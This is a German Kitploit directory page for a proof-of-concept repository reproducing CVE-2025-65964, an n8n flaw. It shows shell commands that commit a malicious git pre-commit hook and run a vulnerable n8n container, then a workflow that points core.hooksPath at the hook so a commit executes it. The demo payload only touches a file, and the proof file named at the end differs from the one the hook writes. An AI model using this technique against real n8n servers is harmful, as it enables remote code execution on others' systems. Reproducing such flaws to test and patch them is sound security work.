Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-65964-Exploit — CVE-2025-65964 Reproduktion | Kitploit
Tools/GitHubGitHub/syzygy-k/cve-2025-65964-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubsyzygy-k/cve-2025-65964-exploit

CVE-2025-65964-Exploit

CVE-2025-65964 Reproduktion

Repository anzeigen
411vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Reproduktionsschritte

Zuerst ein Repository mit einer schädlichen Datei vorbereiten:

root@kitploit:~
mkdir n8n-rce-poc && cd n8n-rce-poc
git init
git remote add origin <repository-url>

mkdir evil_hooks
echo '#!/bin/sh' > evil_hooks/pre-commit
echo 'touch /tmp/pwned_success' >> evil_hooks/pre-commit

chmod +x evil_hooks/pre-commit
git add evil_hooks/pre-commit
git update-index --chmod=+x evil_hooks/pre-commit

git commit -m "Add malicious hook"
git branch -M main
git push -u origin main

Dann lokal einen Docker-Container mit einer betroffenen n8n-Version starten. Der Exploit betrifft einen großen Bereich: 0.123.1 ≤ n8n < 1.119.2. Wir verwenden hier Version 1.64.3.

root@kitploit:~
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  n8nio/n8n:1.64.3

Zunächst der vollständige Angriffsablauf für Version 1.64.3:

image

Knoten 1: Git (Aktion: Clone a repository)

Parameterkonfiguration wie abgebildet:

image

Knoten 2: Code (Modus: Run Once for All Items)

Tool herunterladen

Dieser Knoten und der nächste sind notwendig, da Git nur dann ein Commit erlaubt, wenn eine Datei geändert wurde. Wir müssen also zunächst eine beliebige Datei in das Repository schreiben.

Parameterkonfiguration wie abgebildet:

image

Knoten 3: Read/Write Files from Disk (Aktion: Write)

Datei in das Repository schreiben.

Parameterkonfiguration wie abgebildet:

image

Knoten 4, 5: Git (Aktion: Add configuration property)

Diese beiden Knoten sind nötig, da für einen Commit E-Mail und Benutzername benötigt werden. Einfach irgendwelche Werte eingeben.

Parameterkonfiguration wie abgebildet:

image
image

Knoten 6: Git (Aktion: Commit files or folders to git)

Kernschritt: core.hooksPath auf das heruntergeladene bösartige Verzeichnis setzen. Dadurch wird Git gezwungen, bei der Ausführung von Hooks im angegebenen Verzeichnis zu suchen (standardmäßig .git/hooks).

(Erinnert an das Hijacking von LD_PRELOAD und ähnliches.)

Parameterkonfiguration wie abgebildet:

image

Knoten 7: Git (Aktion: Commit files or folders to git)

Dieser Schritt löst die Schwachstelle aus und führt den manipulierten Hook aus.

Parameterkonfiguration wie abgebildet:

image

Nachdem alle Knoten konfiguriert sind, den Workflow ausführen.

Dann im Docker beobachten: Die schädliche Datei pwned_without_exec_node wurde erstellt.

image